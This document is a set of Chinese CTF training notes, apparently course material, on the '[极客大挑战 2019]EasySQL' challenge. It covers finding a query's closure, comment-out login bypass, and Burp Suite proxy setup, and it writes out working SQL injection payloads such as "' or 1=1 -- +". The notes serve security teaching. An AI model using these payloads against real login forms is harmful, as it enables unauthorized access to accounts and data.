交流群:687306936
老师QQ:2024964385
笔记可以添加老师QQ领取
第二天 [极客大挑战 2019]EasySQL
SELECT first_name, last_name FROM users WHERE user_id = '$id';
第一步找闭合方式
$id=1
SELECT first_name, last_name FROM users WHERE user_id = '1';
$id=1'
SELECT first_name, last_name FROM users WHERE user_id = '1'';
$id=1' and '1'='1
SELECT first_name, last_name FROM users WHERE user_id = '1' and '1'='1';
SELECT first_name, last_name FROM users WHERE user_id = ($id);
$id=1)
SELECT first_name, last_name FROM users WHERE user_id = (1));
select 账号,密码 from 某个表 where 账号=$账号 and 密码=$密码
admin
$账号=admin --
select 账号,密码 from 某个表 where 账号=admin -- and 密码=$密码
插件HackBar V2
Burp Suite
发送数据包的代理:代表你往哪台电脑发送数据包
Bp代理:代表哪个端口接收发来的数据包
发送数据包的代理:
浏览器代理
插件代理
浏览器本身
系统代理(win)
' or 1=1 -- + 和 ' or 1=1 or ''='
select 账号,密码 from 表 where 账号=‘$账号' and 密码=密码
select 账号,密码 from 表 where 账号='' or 1=1 -- + ' and 密码=密码
select 账号,密码 from 表 where 账号=''--+ ' and 密码=密码